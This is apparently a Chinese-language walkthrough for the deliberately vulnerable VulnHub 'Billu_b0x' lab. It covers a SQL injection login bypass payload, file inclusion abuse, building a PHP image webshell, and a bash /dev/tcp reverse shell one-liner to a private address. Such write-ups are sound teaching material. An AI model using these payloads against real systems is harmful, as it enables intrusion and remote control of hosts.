vulhub-Billu-b0x攻略
靶场下载链接
https://download.vulnhub.com/billu/Billu_b0x.zip
将kali和Billu,NAT连接
获取靶场ip
arp-scan -l
使用diesearch进行目录扫描
dirsearch -u " "
查看目录中的信息
打开add.php
打开head.php
打开in,phpinfo()的信息泄露
允许本地文件包含
打开index.php,登录界面,尝试使用万能密码登录(失败)
' or 1=1#
打开phpmy
打开test.php
使用get请求失败
在kali,使用post请求成功
存在文件包含漏洞和文件下载漏洞
使用此请求方式查看一下index.php
发现了登录的逻辑,明白了为什么万能密码会错误
只要在万能密码的后面加一个\就可以了
打开images,图片上传位置
登录
' or 1=1#\
成功登录
show users 显示用户信息,重点有图片
获取到图片上传的路径
右键点击图片,选择在新标签中打开图像
add 添加用户,上传图片
图片马
新建1.php文件写入一句话木马
随便下载一个图片,放在一起
copy 1.png/b + 1.php/a 2.png
将制作好的图片马上传上去
图片马地址http://192.168.31.138/uploaded_images/2.png
制作反弹shell木马文件
show users 点击continue时进行抓包
echo "bash -i >& /dev/tcp/192.168.31.138/8888 0>&1" | bash
将load改为图片马位置,在panel.php后放代码
在kali中监听8888端口
发送到重放器,点击发送,kali中可监听到shell,反弹shell完成